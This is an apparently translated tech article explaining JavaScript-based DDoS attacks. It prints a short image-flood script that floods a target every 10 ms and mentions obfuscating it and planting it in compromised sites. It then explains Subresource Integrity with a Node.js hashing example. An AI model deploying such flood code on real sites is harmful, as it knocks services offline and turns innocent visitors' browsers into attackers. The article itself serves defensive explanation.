2025-01-26 Update, from SLTechnology News&Howtos (shulou)
Shulou(Shulou.com)05/31 Report--
This article describes what a JavaScript-based DDoS attack looks like. The content is detailed, and interested readers can use it as a reference; we hope it is helpful.
The oldest, most common, and yet most frightening attack is the DDoS attack.
In a traditional DDoS attack, the attacker controls a large number of puppet machines and has them send a large number of requests to the target server, preventing legitimate users from accessing the site.
However, in recent years DDoS techniques have kept evolving: attackers now trick users into taking part in an attack in a new and interesting way, by using malicious JavaScript.
JavaScript-based DDoS attacks have an unusual property: any device with a browser may take part in the attack, so the potential attack scale is nearly unlimited.
Principle of JavaScript-based DDoS attacks
Most of the interactions of modern websites are based on JavaScript. JavaScript scripts can be injected directly into HTML or loaded from a remote server through HTML.
    function imgflood() {
      var TARGET = 'victim-website.com'
      var URI = '/index.php?'
      var pic = new Image()
      var rand = Math.floor(Math.random() * 1000)
      pic.src = 'http://' + TARGET + URI + rand + '=val'
    }
    setInterval(imgflood, 10)
The script creates an image element on the page that points to the "victim-website.com" website. Any user who visits a page containing the script becomes a participant in the DDoS attack against "victim-website.com". Every request made by the browser is a valid request, so the attack is a Layer 7 attack.
Because it is JS code, viewing the source of the web page reveals the attack code directly and shows that the page is an attack page. However, if the above code is obfuscated with JShaman, the JS code is protected and becomes harder to identify and discover.
If an attacker compromises a website and embeds malicious JavaScript similar to the above in one of the site's js files, every visitor to the site becomes a participant in the DDoS attack. The higher the site's traffic, the more serious the DDoS.
How to prevent this kind of attack?
At present, HTTP has no mechanism to prevent the script from running, but the W3C has proposed a new feature called Subresource Integrity (SRI), which uses cryptographic hash values to verify scripts; the browser can refuse to run a script if the hash values do not match.
For example, the following script tag:
The browser automatically downloads the .js file and runs it indiscriminately. Even if an attacker has injected a malicious script into the file, the browser will not recognize it, and has no way to. However, if the hash value of the script does not match during validation, Subresource Integrity (SRI) tells the browser not to run the script.
It is recommended that webmasters add this tag to their sites to protect their users from being exploited.
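The SRI check described above, as an added example for Node.js that is not code from the original article: it builds the integrity value a webmaster would publish for a reviewed file, then applies a simplified version of the browser's decision to the reviewed file and to a modified copy. The file contents, the cdn.example URL and the function names are constructed for illustration.

```javascript
// Added example for Node.js; file names and script bodies are constructed.
const crypto = require("crypto");

// Hash algorithms SRI accepts, ordered weakest to strongest.
const SRI_ALGS = ["sha256", "sha384", "sha512"];

// Value for the integrity attribute: "<alg>-<base64 digest of the file>".
function sriValue(body, alg = "sha384") {
  return alg + "-" + crypto.createHash(alg).update(body).digest("base64");
}

// Script tag a webmaster would publish for a file they have reviewed.
function scriptTag(src, body) {
  return `<script src="${src}" integrity="${sriValue(body)}" ` +
         `crossorigin="anonymous"></script>`;
}

// Browser-side decision, simplified: parse the attribute, keep only the
// strongest algorithm listed, and run the script if any such hash matches.
function sriAllows(body, integrity) {
  const entries = integrity.trim().split(/\s+/)
    .map((tok) => /^(sha256|sha384|sha512)-([A-Za-z0-9+/]+={0,2})/.exec(tok))
    .filter(Boolean)
    .map((m) => ({ alg: m[1], digest: m[2] }));
  if (entries.length === 0) return true; // no usable hash: nothing enforced
  const best = Math.max(...entries.map((e) => SRI_ALGS.indexOf(e.alg)));
  return entries
    .filter((e) => SRI_ALGS.indexOf(e.alg) === best)
    .some((e) => sriValue(body, e.alg) === `${e.alg}-${e.digest}`);
}

// Constructed sample: the reviewed library, and the same file after an
// attacker appended code to it on the hosting server.
const reviewed = "function greet(){return 'hi'}\n";
const tampered = reviewed + "/* injected code */ setInterval(function(){}, 10)\n";

const tag = scriptTag("https://cdn.example/lib.js", reviewed);
const published = /integrity="([^"]+)"/.exec(tag)[1];
console.log(tag);
console.log("reviewed file runs:", sriAllows(reviewed, published)); // true
console.log("tampered file runs:", sriAllows(tampered, published)); // false
```

The empty-attribute branch shows why the hash has to be present on every script tag: a tag with no usable integrity value is loaded without any check.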
That is all for this look at JavaScript-based DDoS attacks. I hope the above content is of some help and lets you learn more. If you think the article is good, share it so that more people can see it.